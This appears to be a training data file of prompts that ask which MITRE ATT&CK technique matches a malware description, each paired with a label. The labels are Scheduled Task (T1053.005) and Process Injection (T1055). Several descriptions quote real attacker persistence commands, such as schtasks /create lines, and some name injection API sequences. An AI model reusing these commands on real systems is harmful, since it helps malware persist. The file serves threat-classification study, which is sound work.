+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Goopy has the ability to maintain persistence by creating scheduled tasks set to run every hour.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GravityRAT creates a scheduled task to ensure it is re-executed everyday.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent has the ability to set persistence using the Task Scheduler.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth has used a scheduled task for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HermeticWiper has the ability to use scheduled tasks for execution.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HotCroissant has attempted to install a scheduled task named “Java Maintenance64” on startup to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ISMInjector creates scheduled tasks to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has created a scheduled task that executes every hour to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole has used scheduled tasks named MSST and \Microsoft\Windows\Autochk\Scheduled to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IronNetInjector has used a task XML file named mssch.xml to run an IronPython script when a user logs in or when specific system events are created.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT has registered itself as a scheduled task to run each time the current user logs in.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JSS Loader has the ability to launch scheduled tasks to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic has used scheduled tasks to add persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LitePower can create a scheduled task to enable persistence mechanisms.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lokibot embedded the commands schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I inside a batch script.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer has established persistence by creating the following scheduled task schtasks /create /sc minute /mo 1 /tn QQMusic ^ /tr C:Users\%USERPROFILE%\Downloads\spread.exe /F.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD can use scheduled tasks for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The different components of Machete are executed by Windows Task Scheduler.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka can establish persistence by adding a Scheduled Task named ""Microsoft Boost Kernel Optimization"".","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has created scheduled tasks using name variants such as ""Windows Update Security"", ""Windows Update Security Patches"", and ""Google Chrome Security Update"", to launch Maze at a specific time.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Meteor execution begins from a scheduled task named `Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeAll` and it creates a separate scheduled task called `mstask` to run the wiper only once at 23:55:00.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Milan can establish persistence on a targeted host with scheduled tasks.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can create a scheduled task to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NotPetya creates a task to reboot the system one hour after infection.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum's installer can attempt to achieve persistence by creating a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: OopsIE creates a scheduled task to run itself every three minutes.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSTATS has established persistence through a scheduled task using the command ”C:\Windows\system32\schtasks.exe” /Create /F /SC DAILY /ST 12:00 /TN MicrosoftEdge /TR “c:\Windows\system32\wscript.exe C:\Windows\temp\Windows.vbe”.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWRUNER persists through a scheduled task that executes it every minute.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's New-UserPersistenceOption Persistence argument can be used to establish via a Scheduled Task/Job.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prestige has been executed on a target system through a scheduled task created by Sandworm Team using Impacket.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon schedules tasks to invoke its components in order to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QUADAGENT creates a scheduled task to maintain persistence on the victim’s machine.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot has the ability to create scheduled tasks for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QuasarRAT contains a .NET wrapper DLL for creating and managing scheduled tasks for maintaining persistence upon reboot.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM tries to add a scheduled task to establish persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RainyDay can use scheduled tasks to achieve persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay can schedule tasks via the Windows COM API to maintain persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Remexi utilizes scheduled tasks as a persistence mechanism.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RemoteCMD can execute commands remotely by creating a new schedule task on the remote system,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Revenge RAT schedules tasks to run malicious scripts at different intervals.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ryuk can remotely create a scheduled task to execute itself on a system.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SQLRat has created scheduled tasks in %appdata%\Roaming\Microsoft\Templates\.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SUGARDUMP has created scheduled tasks called `MicrosoftInternetExplorerCrashRepoeterTaskMachineUA` and `MicrosoftEdgeCrashRepoeterTaskMachineUA`, which were configured to execute `CrashReporter.exe` during user logon.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SVCReady can create a scheduled task named `RecoveryExTask` to gain persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Saint Bot has created a scheduled task named ""Maintenance"" to establish persistence.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ServHelper contains modules that will use schtasks to carry out malicious operations.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Shamoon copies an executable payload to the target system by using SMB/Windows Admin Shares and then scheduling an unnamed task to execute the malware.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpDisco can create scheduled tasks to execute reverse shells that read and write data to and from specified SMB shares.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SharpStage has a persistence component to write a scheduled task for the payload.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Sibot has been executed via a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Smoke Loader launches a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: SoreFang can gain persistence through use of scheduled tasks.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Stuxnet schedules a network job to execute two minutes after host infection.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tarrask is able to create “hidden” scheduled tasks for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Tomiris has used `SCHTASKS /CREATE /SC DAILY /TN StartDVL /TR ""[path to self]"" /ST 10:00` to establish persistence.","Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TrickBot creates a scheduled task on the system that provides persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Valak has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Zebrocy has a command to create a scheduled task for persistence.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ZxxZ has used scheduled tasks for persistence and execution.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ccf32 can run on a daily basis using a scheduled task.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: schtasks is used to schedule tasks on a Windows system to run at a specific date and time.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: yty establishes persistence by creating a scheduled task with the command SchTasks /Create /SC DAILY /TN BigData /TR “ + path_file + “/ST 09:30“.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: zwShell has used SchTasks for execution.,"Tecnique: T1053.005 Scheduled Task/Job: Scheduled Task, Tactic: TA0002 Execution TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During the 2015 Ukraine Electric Power Attack, Sandworm Team loaded BlackEnergy into svchost.exe, which then launched iexplore.exe for their C2.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Cutting Edge, threat actors used malicious SparkGateway plugins to inject shared objects into web process memory on compromised Ivanti Secure Connect VPNs to enable deployment of backdoors.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Sharpshooter, threat actors leveraged embedded shellcode to inject a downloader into the memory of Word.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: During Operation Wocao, threat actors injected code into a selected process, which in turn launches a command as a child process of the original.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT32 malware has injected a Cobalt Strike beacon into Rundll32.exe.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT37 injects its malware variant, ROKRAT, into the cmd.exe process.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT41 malware TIDYELF loaded the main WINTERLOVE component by injecting it into the iexplore.exe process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: APT5 has used the CLEANPULSE utility to insert command line strings into a targeted process to alter its functionality.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Group has injected code into trusted processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kimsuky has used Win7Elevate to inject malicious code into explorer.exe.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLATINUM has used various methods of process injection including hot patching.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Silence has injected a DLL library containing a Trojan into the fwmain32.exe process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: TA2541 has injected malicious code into legitimate .NET related processes including regsvcs.exe, msbuild.exe, and installutil.exe.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Turla has also used PowerSploit's Invoke-ReflectivePEInjection.ps1 to reflectively load a PowerShell payload into a random process on the victim system.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Wizard Spider has used process injection to execute payloads to escalate privileges.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ABK has the ability to inject shellcode into svchost.exe.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ANDROMEDA can inject into the `wuauclt.exe` process to perform C2 actions.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Agent Tesla can inject into known, vulnerable binaries on targeted hosts.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Attor's dispatcher can inject itself into running processes to gain higher privileges and to evade detection.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: AuditCred can inject code from files to other running processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Avenger has the ability to inject shellcode into svchost.exe.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BADHATCH can inject itself into an existing explorer.exe process by using `RtlCreateUserThread`.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: BBK has the ability to inject shellcode into svchost.exe.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Backdoor.Oldrea injects itself into explorer.exe.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bazar can inject code through calling VirtualAllocExNuma.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Bumblebee can inject code into multiple processes on infected endpoints.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: COATHANGER includes a binary labeled `authd` that can inject a library into a running process and then hook an existing function within that process with a new function from that library.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT injects into a newly spawned process created from a native Windows executable.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can inject into the `svchost.exe` process for execution.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobalt Strike can inject a variety of payloads into processes dynamically chosen by the adversary.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CostaBricks can inject a payload into the memory of a compromised host.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Donut includes a subproject DonutTest to inject shellcode into a target process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Dyre has the ability to directly inject its code into the web browser process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Egregor can inject its payload into iexplore.exe process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire contains multiple modules for injecting into processes, such as Invoke-PSInject.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer injects its communication module into an Internet accessible process through which it performs C2.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader has the ability to inject shellcode into a donor processes that is started in a suspended state. GuLoader has previously used RegAsm as a donor process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HOPLIGHT has injected into running processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTRAN can inject into into running processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HyperBro can run shellcode it injects into a newly created process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can inject itself into another process to avoid detection including use of a technique called ListPlanting that customizes the sorting algorithm in a ListView structure.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IronNetInjector can use an IronPython scripts to load a .NET injector to inject a payload into its own or a remote process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT performs code injection injecting its own functions to browser processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JPIN can inject content into lsass.exe to load a module.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lizar can migrate the loader into another process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mis-Type has been injected directly into a running process, including `explorer.exe`.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu's binary is injected into memory via `WriteProcessMemory`.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT copies itself into a running Internet Explorer process to evade detection.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ninja has the ability to inject an agent module into a new process and arbitrary shellcode into running processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pandora can start and inject code into a new `svchost` process.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The PcShare payload has been injected into the `logagent.exe` and `rdpclip.exe` processes.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoshC2 contains multiple modules for injecting into processes, such as Invoke-PSInject.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can inject itself into processes including explore.exe, Iexplore.exe, Mobsync.exe., and wermgr.exe.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: REvil can inject itself into running processes on a compromised host.,"Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ROKRAT can use `VirtualAlloc`, `WriteProcessMemory`, and then `CreateRemoteThread` to execute shellcode within the address space of `Notepad.exe`.","Tecnique: T1055 Process Injection, Tactic: TA0005 Defense Evasion TA0004 Privilege Escalation "
